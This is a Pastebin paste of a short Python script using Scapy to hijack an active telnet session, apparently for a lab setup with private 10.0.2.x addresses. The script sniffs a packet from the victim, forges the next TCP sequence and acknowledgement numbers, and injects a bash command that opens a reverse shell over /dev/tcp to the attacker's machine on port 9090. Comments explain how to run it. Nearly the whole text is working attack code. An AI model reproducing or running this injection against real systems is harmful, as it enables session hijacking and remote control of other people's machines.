Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from scapy.all import *
- #Telnet session has to be already active. Listens for a telnet packet
- #sent from the client to the server. Will take the seq and acks numbers
- #of that packet and increment both by one. (Since a keypress will send one byte of data, the next packet should have seq+1)
- #This script is very basic and will not work if the spoofed client
- #command contains more than one byte of data.
- #So, login in to telnet from client. Run script on attacker, then press a key on client.
- my_iface="enp0s3"
- my_ip="10.0.2.15"
- victim_ip="10.0.2.4"
- tcp_data = "\r/bin/bash -i > /dev/tcp/" + my_ip + "/9090 0<&1 2>&1\r"
- t = sniff(iface=my_iface, count=1,
- lfilter=lambda x: x.haslayer(TCP)
- and x[IP].src == victim_ip)
- t = t[0]
- tcpdata = {
- 'src' : t[IP].src,
- 'dst' : t[IP].dst,
- 'sport' : t[TCP].sport,
- 'dport' : t[TCP].dport,
- 'seq' : t[TCP].seq,
- 'ack' : t[TCP].ack
- }
- p = IP(src=tcpdata['src'], dst=tcpdata['dst']) / \
- TCP(sport=tcpdata['sport'], dport=tcpdata['dport'],
- flags="A", seq=tcpdata['seq']+1, ack=tcpdata['ack']+1) / tcp_data
- send(p, verbose=1, iface=my_iface)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement